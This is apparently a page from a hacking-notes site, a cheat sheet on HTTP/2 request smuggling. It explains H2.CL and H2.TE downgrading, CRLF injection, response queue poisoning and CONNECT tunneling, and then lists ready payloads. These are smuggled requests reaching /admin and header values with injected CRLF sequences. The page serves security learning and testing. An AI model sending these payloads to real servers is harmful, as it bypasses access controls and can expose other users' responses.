Hacking Notes | Welcome 👋

What is Request Smuggling HTTP/2

A web vulnerability where incompatible parsing of HTTP/2 requests between a front-end and back-end server allows attackers to interfere with how requests are processed. It can exploit differences in how headers like Content-Length or Transfer-Encoding are interpreted, potentially leading to unauthorized actions, data leakage, or bypassing security controls.

Methodology

Example of a normal H2 request

|:method|POST|
|:path|/example|
|:authority|vulnerable-website.com|
|content-type|application/x-www-form-urlencoded|
|transfer-encoding|chunked|
|body|data-here|

Exploitation

# IMPORTANT SETTING

- Remove update content length: Ensure that content-length headers are properly managed or removed to avoid inconsistencies that can lead to desync issues.
  
- Important: (\r & \n) count as characters during processing, especially critical when handling headers or payload manipulation.

---------------------------------------------------------------------------------
# HTTP/2 Downgrading

HTTP/2 downgrading exploits the difference in handling between HTTP/2 requests (frontend) and the corresponding HTTP/1.1 requests (backend). This can result in HTTP desynchronization attacks.

- H2.CL (Content-Length)
- H2.TE (Transfer-Encoding)

---------------------------------------------------------------------------------
# CRLF (%0d%0a ---> \r\n)

- CRLF stands for Carriage Return (\r) and Line Feed (\n). These characters are used to terminate lines in HTTP headers.
- Understanding CRLF usage is critical for:
    - Header injections
    - Splitting attacks
    - Response smuggling

|:method|POST|
|:path|/example|
|:authority|vulnerable-website.com|
|content-type|application/x-www-form-urlencoded|
|foo|bar\r\nTransfer-Encoding: chunked|

As a result, an HTTP/1 back-end server would see two distinct headers 

Foo: bar
Transfer-Encoding: chunked

---------------------------------------------------------------------------------
# Response queue poisoning

Response queue poisoning means that all users of the same front-end/back-end connection are persistently served responses that were intended for someone else.

Conditions
- The TCP connection between the front-end server and back-end server is reused for multiple request/response cycles
- The attacker is able to successfully smuggle a complete, standalone request that receives its own distinct response from the back-end server.
- The attack does not result in either server closing the TCP connection. Servers generally close incoming connections when they receive an invalid request because they can't determine where the request is supposed to end.

---------------------------------------------------------------------------------
# Request Tunneling

Request tunneling exploits the behavior of intermediary systems (e.g., proxies) to bypass security controls. It involves embedding one request inside another.

- Key Techniques:
    - Misuse of `CONNECT` requests for unrestricted forwarding.
    - Combining HTTP methods like `POST` and `GET` to bypass filtering.
- Example Scenario:
    1. Use `CONNECT` for an encrypted tunnel.
    2. Send crafted HTTP requests through the tunnel, avoiding detection by firewalls or IDS.
- Mitigation Tips:
    - Validate and restrict allowed HTTP methods.
    - Monitor proxy logs for unusual traffic patterns.

Usage

Leaking Internal Headers
Bypassing Frontend Restrictions (Request Resource)
Web Cache Poisoning (Change Path)

Payloads

# H2.CL

POST /target HTTP/2
Host: example.com
content-length: 0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10 
x=1GET / H

----------------------------------------------------------------------------------
# H2.TE

POST /example HTTP/2 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Transfer-Encoding: chunked 

0 

GET /admin HTTP/1.1 
Host: vulnerable-website.com 
Foo: bar

----------------------------------------------------------------------------------
# CRLF Injection

POST /example HTTP/2 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Foo: bar\nTransfer-Encoding: chunked

0

GET /admin HTTP/1.1 
Host: vulnerable-website.com 
Foo: bar

----------------------------------------------------------------------------------
# HTTP/2 Request Splitting

POST /example HTTP/2 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Foo: bar\r\n 
\r\n 
GET /admin HTTP/1.1\r\n 
Host: vulnerable-website.com

----------------------------------------------------------------------------------
HTTP Request Tunneling

:method: CONNECT
:scheme: https
:path: /target
:authority: example.com
content-length: 13

0

CONNECT /admin HTTP/2
:authority: example.com

Tool

H2C Smuggler (opens in a new tab)

Cvss